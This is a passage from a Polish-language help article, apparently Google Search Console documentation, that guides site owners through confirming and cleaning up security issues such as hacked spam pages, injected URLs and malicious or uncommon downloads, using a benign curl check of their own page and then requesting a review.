  • Uzyskują dostęp do niezabezpieczonego katalogu na serwerze. Na przykład administrator mógł przypadkowo ustawić uprawnienia swobodnego dostępu do katalogu.
  • Wykorzystują lukę w zabezpieczeniach działającego w witrynie oprogramowania, takiego jak system zarządzania treścią. Na przykład może to być starsza, niezabezpieczona wersja Drupal, Joomla! lub WordPress.
  • Atakują wtyczki firm zewnętrznych używane w witrynie, np. liczniki odwiedzin.

1. Zdecyduj, czy możesz ten problem rozwiązać samodzielnie

Zobacz artykuł Uzyskaj pomoc innych osób, by dowiedzieć się, co trzeba zrobić w celu rozwiązania problemu lub jak znaleźć pomoc, jeśli nie możesz tego zrobić samodzielnie.

2. Potwierdź problem

Unikaj bezpośredniego otwierania zainfekowanych stron witryny w przeglądarce.

Złośliwe oprogramowanie często się rozpowszechnia, wykorzystując luki w zabezpieczeniach przeglądarki, dlatego otwarcie zainfekowanej nim strony może spowodować szkody na Twoim komputerze. Co więcej, hakerzy mogą ukrywać spamerską treść przed właścicielami witryn, używając technik maskowania.

Oto dwie alternatywne metody bezpieczniejszego przeglądania treści na komputerze:

  • Użyj narzędzia do sprawdzania adresów URL, by wyświetlić stronę tak samo, jak widzi ją Google. To bardzo praktyczna metoda, ponieważ hakerzy często wprowadzają zmiany, które są widoczne tylko dla komputerów Google. Na przykład mogą dodać na Twoich stronach linki prowadzące do ich witryny, które są renderowane tylko wtedy, gdy stroną odsyłającą jest Google.
  • Skorzystaj z narzędzi cURL lub Wget, by wysłać żądania HTTP (na przykład służące do wyświetlenia strony) z wiersza poleceń. Te bezpłatne narzędzia pozwalają dołączyć do żądań informacje o stronie odsyłającej i kliencie użytkownika, co ułatwia diagnostykę przekierowań. Hakerzy często atakują tylko określone klienty użytkownika lub strony odsyłające, by uniknąć wykrycia i wybrać lepsze cele. Dzięki tym narzędziom możesz imitować cel. Jeśli Twoje żądanie nie wywoła spamu, spróbuj użyć różnych adresów stron odsyłających (takich jak linki z dużych witryn lub różnych wyszukiwarek). Aby na przykład naśladować takie działanie użytkownika jak kliknięcie w wynikach wyszukiwania Google linku www.example.com/page.html na komputerze z systemem Windows, użyj narzędzia cURL w ten sposób:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Wyślij żądania wyświetlenia niektórych stron w witrynie i przeszukaj odpowiedzi pod kątem podejrzanych treści lub linków, które nie zostały dodane przez Ciebie. Poszukaj na przykład nazw środków farmaceutycznych lub terminów spamerskich, takich jak „viagra” czy „zarabiaj pieniądze”.

3. Wyczyść witrynę

Gdy przygotujesz się do czyszczenia witryny, możesz zastąpić zmodyfikowane pliki ostatnią nienaruszoną kopią zapasową lub usunąć spamerskie treści i linki z każdej strony. Pamiętaj, by oczyścić wszystkie przykładowe zaatakowane strony wymienione w raporcie „Problemy dotyczące bezpieczeństwa”. Przeprowadź też wyszukiwanie z operatorem „site:” w Google i przeszukaj pliki źródłowe w witrynie, by znaleźć inne strony, które mogły zostać zaatakowane przez hakerów.

Dodatkowo:

4. Poproś o sprawdzenie witryny

Gdy potwierdzisz, że problem w witrynie został rozwiązany, poproś o sprawdzenie zabezpieczeń z poziomu raportu „Problemy dotyczące bezpieczeństwa”. Może to potrwać od kilku dni do kilku tygodni.

Typ ataku hakera: wstrzyknięty URL

Haker utworzył nowe strony w witrynie, zwykle ze spamerskimi słowami i linkami. Czasami zawierają one kod, który wykonuje niepożądane działania, np. przekierowuje użytkowników do innych witryn lub powoduje, że witryna uczestniczy w atakach typu „odmowa usługi” na inne witryny.

1. Zdecyduj, czy możesz ten problem rozwiązać samodzielnie

Zobacz artykuł Uzyskaj pomoc innych osób, by dowiedzieć się, co trzeba zrobić w celu rozwiązania problemu lub jak znaleźć pomoc, jeśli nie możesz tego zrobić samodzielnie.

2. Potwierdź problem

Unikaj bezpośredniego otwierania zainfekowanych stron witryny w przeglądarce.

Złośliwe oprogramowanie często się rozpowszechnia, wykorzystując luki w zabezpieczeniach przeglądarki, dlatego otwarcie zainfekowanej nim strony może spowodować szkody na Twoim komputerze. Co więcej, hakerzy mogą ukrywać spamerską treść przed właścicielami witryn, używając technik maskowania.

Oto dwie alternatywne metody bezpieczniejszego przeglądania treści na komputerze:

  • Użyj narzędzia do sprawdzania adresów URL, by wyświetlić stronę tak samo, jak widzi ją Google. To bardzo praktyczna metoda, ponieważ hakerzy często wprowadzają zmiany, które są widoczne tylko dla komputerów Google. Na przykład mogą dodać na Twoich stronach linki prowadzące do ich witryny, które są renderowane tylko wtedy, gdy stroną odsyłającą jest Google.
  • Skorzystaj z narzędzi cURL lub Wget, by wysłać żądania HTTP (na przykład służące do wyświetlenia strony) z wiersza poleceń. Te bezpłatne narzędzia pozwalają dołączyć do żądań informacje o stronie odsyłającej i kliencie użytkownika, co ułatwia diagnostykę przekierowań. Hakerzy często atakują tylko określone klienty użytkownika lub strony odsyłające, by uniknąć wykrycia i wybrać lepsze cele. Dzięki tym narzędziom możesz imitować cel. Jeśli Twoje żądanie nie wywoła spamu, spróbuj użyć różnych adresów stron odsyłających (takich jak linki z dużych witryn lub różnych wyszukiwarek). Aby na przykład naśladować takie działanie użytkownika jak kliknięcie w wynikach wyszukiwania Google linku www.example.com/page.html na komputerze z systemem Windows, użyj narzędzia cURL w ten sposób:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Wyszukaj przykładowe adresy URL wymienione w raporcie, by sprawdzić, czy są aktywne. Te strony prawdopodobnie nie zostały utworzone przez Ciebie, więc musisz je usunąć ze swojej witryny lub wyeliminować kod, który je automatycznie generuje. Przeczytaj, jak znaleźć te strony i usunąć je z witryny

Możesz też przeprowadzić wyszukiwanie z operatorem „site:”, by znaleźć strony, które nie zostały utworzone przez Ciebie.

  • W przypadku małej witryny możesz wpisać [site:example.com] w wyszukiwarce Google, by wyświetlić listę zindeksowanych przez nas stron i sprawdzić, czy są wśród nich strony nieutworzone przez Ciebie.
  • W przypadku dużych witryn możesz użyć bardziej sprecyzowanego zapytania, na przykład:
    • [site:example.com leki] – wyświetla listę wszystkich stron zawierających słowo „leki” w witrynie example.com. Możesz tu wstawić inne typowe hasła spamerskie.
    • [site:example.com/wp-admin/] – wyświetla listę wszystkich stron w sekcji administratora witryny WordPress.

3. Wyczyść witrynę

Gdy przygotujesz się do czyszczenia witryny, możesz zastąpić zmodyfikowane katalogi nienaruszoną kopią zapasową lub usunąć niepożądane strony i wszystkie pliki lub funkcje, których haker użył, by te katalogi utworzyć.

Dodatkowo:

4. Poproś o sprawdzenie witryny

Gdy potwierdzisz, że problem w witrynie został rozwiązany, poproś o sprawdzenie zabezpieczeń z poziomu raportu „Problemy dotyczące bezpieczeństwa”. Może to potrwać od kilku dni do kilku tygodni.

Szkodliwe pliki do pobrania

Z Twojej witryny użytkownicy mogą pobrać pliki, które Bezpieczne przeglądanie Google uważa za złośliwe lub niechciane oprogramowanie. Przeglądarka Chrome może wyświetlić ostrzeżenie, gdy użytkownik wejdzie na Twoją stronę. Aby ostrzeżenie przestało się wyświetlać, musisz usunąć te pliki ze swojej strony.

1. Oceń problem

Jeśli te pliki zostały umieszczone celowo, usuń je z witryny i wybierz Poproś o sprawdzenie.

Jeśli nie wiesz nic o żadnych plikach do pobrania w witrynie, mogło dojść do ataku hakera. Napraw błędy w zaatakowanej witrynie oraz znajdź i usuń pliki do pobrania.

2. Zdecyduj, czy możesz ten problem rozwiązać samodzielnie

Zobacz artykuł Uzyskaj pomoc innych osób, by dowiedzieć się, co trzeba zrobić w celu rozwiązania problemu lub jak znaleźć pomoc, jeśli nie możesz tego zrobić samodzielnie.

3. Potwierdź problem

Przejrzyj niektóre przykładowe strony w witrynie, by potwierdzić, że zawierają takie pliki do pobrania.

4. Wyczyść witrynę

Przeczytaj przewodnik dla właścicieli witryn zaatakowanych przez hakerów, by poznać pełną procedurę rozwiązywania problemu, między innymi opis czyszczenia witryny, oraz wskazówki, jak ją ochronić przed ponownym atakiem. Gdy przygotujesz się do czyszczenia witryny, możesz zastąpić zmodyfikowane pliki nienaruszoną kopią zapasową lub samodzielnie usunąć treści spamerskie. Skanuj pliki binarne i całą hostowaną zawartość witryny za pomocą oprogramowania antywirusowego. Oprogramowanie antywirusowe umożliwia znalezienie wielu rodzajów złośliwych i niechcianych aplikacji, ale nie zawsze jest skuteczne. Przesłanie oprogramowania do programu antywirusowego (lub skonsolidowanej usługi antywirusowej, np. VirusTotal) umożliwia określenie potencjalnych problemów. Funkcja Bezpieczne przeglądanie Google stosuje własne kryteria do określenia, czy program lub plik binarny zawiera niechciane bądź złośliwe oprogramowanie.

5. Potwierdź poprawki

Upewnij się, że Twoja witryna jest zgodna z Zasadami dotyczącymi niechcianego oprogramowania.

6. Poproś o sprawdzenie witryny

Gdy potwierdzisz, że problem w witrynie został rozwiązany, poproś o sprawdzenie zabezpieczeń z poziomu raportu „Problemy dotyczące bezpieczeństwa”. Może to potrwać od kilku dni do kilku tygodni.

Linki do szkodliwych plików do pobrania

Twoja witryna zawiera linki do witryn, z których według Bezpiecznego przeglądania Google można pobrać złośliwe lub niechciane oprogramowanie. Przeglądarka Chrome może wyświetlić ostrzeżenie, gdy użytkownik wejdzie na Twoją stronę. Aby ostrzeżenie przestało się wyświetlać, musisz usunąć linki do szkodliwych witryn.

1. Oceń problem

Jeśli te linki zostały umieszczone celowo, usuń je z witryny i wybierz Poproś o sprawdzenie.

Jeśli nie wiesz nic o tych linkach, mogło dojść do ataku hakera.

2. Zdecyduj, czy możesz ten problem rozwiązać samodzielnie

Jeśli Twoja witryna została zaatakowana przez hakerów, zobacz artykuł Uzyskaj pomoc innych osób, by dowiedzieć się, co trzeba zrobić w celu rozwiązania problemu lub jak znaleźć pomoc, jeśli nie możesz tego zrobić samodzielnie.

3. Potwierdź problem

 

Przejrzyj niektóre przykładowe strony w witrynie, by potwierdzić, że zawierają takie pliki do pobrania. W niektórych przypadkach hakerzy mogą je ukrywać, jeśli sądzą, że jesteś właścicielem witryny, więc spróbuj otworzyć przykładowe strony za pomocą narzędzia do sprawdzania adresów URL lub zaloguj się najpierw na inne konto lub inny komputer.

4. Wyczyść witrynę

Przeczytaj przewodnik dla właścicieli witryn zaatakowanych przez hakerów, by poznać pełną procedurę rozwiązywania problemu, między innymi opis czyszczenia witryny, oraz wskazówki, jak ją ochronić przed ponownym atakiem. Gdy przygotujesz się do czyszczenia witryny, możesz zastąpić zmodyfikowane pliki nienaruszoną kopią zapasową lub samodzielnie usunąć treści spamerskie.

5. Potwierdź poprawki

Upewnij się, że Twoja witryna jest zgodna z Zasadami dotyczącymi niechcianego oprogramowania.

6. Poproś o sprawdzenie witryny

Gdy potwierdzisz, że problem w witrynie został rozwiązany, poproś o sprawdzenie zabezpieczeń z poziomu raportu „Problemy dotyczące bezpieczeństwa”. Może to potrwać od kilku dni do kilku tygodni.

Niejasne płatności za usługi mobilne

Wykryliśmy, że Twoja witryna w niewystarczający sposób informuje użytkowników o opłatach za korzystanie z wersji mobilnej, dlatego Chrome może wyświetlić ostrzeżenie, zanim użytkownik ją otworzy.

1. Potwierdź problem

Wejdź na przykładowe strony wymienione w raporcie, by sprawdzić, gdzie płatności za usługi mobilne są niejasne. Zapoznaj się z wytycznymi dotyczącymi płatności za usługi mobilne

2. Rozwiąż problem

Napraw błędy, by strony były zgodne ze sprawdzonymi metodami płatności za usługi mobilne.

3. Poproś o sprawdzenie witryny

Gdy potwierdzisz, że problem w witrynie został rozwiązany, poproś o sprawdzenie zabezpieczeń z poziomu raportu „Problemy dotyczące bezpieczeństwa”. Może to potrwać od kilku dni do kilku tygodni.

Nietypowe pliki do pobrania

Z Twojej witryny można pobrać plik, którego Bezpieczne przeglądanie Google nie rozpoznaje. Przeglądarka Chrome może ostrzegać, że plik nie jest zwykle pobierany i może być niebezpieczny. Gdy tylko Bezpieczne przeglądanie Google stwierdzi, że pliki nie stanowią zagrożenia, wyłączymy ostrzeżenia. Zwróć uwagę, że w przypadku tego problemu nie zawsze są podane przykładowe adresy URL.

Ten problem nie uniemożliwia wyświetlania Twojej strony lub witryny w wynikach wyszukiwania Google, ale powoduje wyświetlenie w przeglądarce Chrome ostrzeżenia, gdy użytkownik inicjuje pobieranie nieznanych plików.

1. Rozwiąż problem

Sprawdź, czy pliki do pobrania są zgodne z wytycznymi dotyczącymi pobierania.

  • Usuń ze swojej witryny pliki, które naruszają te wytyczne.
  • Jeśli ich nie naruszają, nie musisz ich usuwać.

2. Poproś o sprawdzenie witryny

Gdy zakończysz usuwanie plików (lub upewnisz się, że pliki do pobrania spełniają wytyczne), poproś o sprawdzenie zabezpieczeń z poziomu raportu „Problemy dotyczące bezpieczeństwa”. Może to potrwać od kilku dni do kilku tygodni. Nawet jeśli nie prześlesz prośby o sprawdzenie, Google oceni w końcu większość plików do pobrania i sklasyfikuje je jako dopuszczalne lub szkodliwe. Przesłanie prośby o sprawdzenie może przyspieszyć proces oceny.

 

Różnica między raportem „Ręczne działania” a raportem „Problemy dotyczące bezpieczeństwa”

Raport „Ręczne działania” zawiera spis problemów na stronie lub w witrynie, polegających zwykle na próbie manipulacji naszym indeksem wyszukiwania, jednak raczej nie stanowiących zagrożenia. Większość zgłoszonych tu problemów powoduje obniżenie pozycji stron lub witryny w rankingu lub niewyświetlanie ich w wynikach wyszukiwania bez jakiegokolwiek wizualnego wskazania dla użytkownika.

Raport „Problemy dotyczące bezpieczeństwa” zawiera powiadomienia o atakach hakerskich na Twoją witrynę lub o takim działaniu wykonywanym w Twojej witrynie, które może być szkodliwe dla użytkowników bądź ich komputerów, np. o atakach mających na celu wyłudzenie informacji lub zainstalowanie na komputerach użytkowników złośliwego lub niechcianego oprogramowania. Te strony mogą wyświetlać się w wynikach wyszukiwania z etykietą ostrzegawczą lub podczas próby wejścia na taką stronę w przeglądarce może pojawiać się pełnoekranowe ostrzeżenie.

Czy to było pomocne?
Jak możemy ją poprawić?